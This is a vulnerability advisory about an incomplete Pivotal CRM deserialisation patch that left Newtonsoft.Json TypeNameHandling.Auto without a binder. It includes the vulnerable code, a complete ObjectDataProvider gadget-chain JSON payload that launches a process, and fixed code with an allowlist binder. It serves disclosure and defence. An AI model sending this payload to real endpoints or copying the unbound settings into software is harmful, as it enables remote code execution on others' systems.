This advisory documents a regression vulnerability introduced by the patch for CVE-2026-39253. While Pivotal's initial remediation attempted to address an insecure deserialisation flaw by replacing BinaryFormatter with JSON.NET, the implementation left critical security controls absent, allowing the same remote code execution attacks to continue under a different serialisation format.
Pivotal released a patch in December 2025 to fix CVE-2026-39253, which involved unsafe deserialisation in the Smart Client and PBS components. The patch replaced the vulnerable BinaryFormatter with Newtonsoft.Json; however, the configuration left TypeNameHandling set to 4 (TypeNameHandling.Auto) without assigning a SerializationBinder.
TypeNameHandling.Auto allows JSON payloads to specify which .NET types to instantiate via $type metadata. With no binder assigned, this bypasses the allowlist restrictions defined in SafeSerializationBinder, which existed in the codebase but was never wired into the actual deserialisation code path. As a result, the introduced binder effectively remained unused while the vulnerability persisted under a different library.
The vulnerable code in the initial patch looked like this:
    JsonConvert.DeserializeObject(
        Encoding.UTF8.GetString(bytes),
        new JsonSerializerSettings
        {
            TypeNameHandling = TypeNameHandling.Auto   // numeric value 4; honours $type
            // No SerializationBinder assigned
        }
    );
An attacker could craft a malicious JSON payload with arbitrary $type properties to instantiate dangerous .NET types. The ObjectDataProvider gadget chain, which works against BinaryFormatter, works equally well here:
    {
        "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
        "MethodName": "Start",
        "ObjectInstance": {
            "$type": "System.Diagnostics.Process, System"
        },
        "MethodParameters": {
            "$type": "System.Collections.ArrayList, mscorlib",
            "$values": ["calc.exe"]
        }
    }
Base64 encoding this payload and sending it through the vulnerable endpoint would execute arbitrary commands.
The regression affects Pivotal CRM 6.6.4.08 and systems using the initial remediation patch (patch-ghi-15381-cwe-502-20251225.zip). The vulnerable DLL is Pivotal.Engine.Client.Services.Conversion.dll with MD5: D3964A789F1354BBC9980D336218E511.
Pivotal released an updated patch (Patch_CWE502_20260316.zip) that properly implements SafeJsonSerializationBinder and assigns it in the deserialisation settings so that it is actually enforced. The fix also includes a first-byte check to block legacy BinaryFormatter payloads. This version is included in Pivotal CRM 6.6.5.10 and later.
The corrected code assigns the binder to the JsonSerializerSettings:
    JsonConvert.DeserializeObject(
        Encoding.UTF8.GetString(bytes),
        new JsonSerializerSettings
        {
            TypeNameHandling = TypeNameHandling.Auto,   // numeric value 4, as before
            SerializationBinder = SafeJsonSerializationBinder.Instance
        }
    );
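As an added illustration (not Pivotal's code; the AllowlistBinder and ConversionRequest names are constructed for this example), the following shows what an allowlist binder in the shape of Newtonsoft's ISerializationBinder looks like, combined with the first-byte check the updated patch describes. Any $type outside the allowlist, including the ObjectDataProvider entry above, is rejected before anything is instantiated.

```csharp
using System;
using System.Collections.Generic;
using System.Text;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;

// Hypothetical allowlist binder; stands in for Pivotal's SafeJsonSerializationBinder.
sealed class AllowlistBinder : ISerializationBinder
{
    // Only the types the application legitimately exchanges are resolvable.
    private static readonly Dictionary<string, Type> Allowed = new Dictionary<string, Type>
    {
        ["ConversionRequest"] = typeof(ConversionRequest), // constructed sample type
    };

    public Type BindToType(string assemblyName, string typeName)
    {
        if (Allowed.TryGetValue(typeName, out var type))
            return type;
        // Fail closed: an unknown $type (e.g. ObjectDataProvider) is rejected
        // before Newtonsoft.Json instantiates anything.
        throw new JsonSerializationException($"Type '{typeName}' is not permitted.");
    }

    public void BindToName(Type serializedType, out string assemblyName, out string typeName)
    {
        assemblyName = null;
        typeName = serializedType.Name; // emit the short name the allowlist keys on
    }
}

sealed class ConversionRequest { public string Source { get; set; } }
static class SafeDeserialiser
{
    public static object Deserialise(byte[] bytes)
    {
        // First-byte check: a BinaryFormatter stream starts with the
        // SerializationHeaderRecord (0x00); JSON text never does.
        if (bytes.Length == 0 || bytes[0] == 0x00)
            throw new InvalidOperationException("Legacy BinaryFormatter payloads are rejected.");
        return JsonConvert.DeserializeObject(
            Encoding.UTF8.GetString(bytes),
            new JsonSerializerSettings
            {
                TypeNameHandling = TypeNameHandling.Auto, // numeric value 4 in the advisory
                SerializationBinder = new AllowlistBinder()
            });
    }
}
```

Feeding the ObjectDataProvider payload from above into SafeDeserialiser.Deserialise throws from BindToType, whereas a document whose $type is "ConversionRequest" deserialises normally.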
This vulnerability exists as a direct result of the incomplete patch for CVE-2026-39253. Both flaws involve the same vulnerable code path but represent different stages of remediation. Systems patched with the December 2025 update remain vulnerable to CVE-2026-51947 until upgraded to the March 2026 patch or Pivotal CRM 6.6.5.10.
CVE-2026-39253: Original Insecure Deserialisation Advisory
Pivotal Support: CWE-502 Remediation
Discovered and reported by Tim Wong, SilentGrid.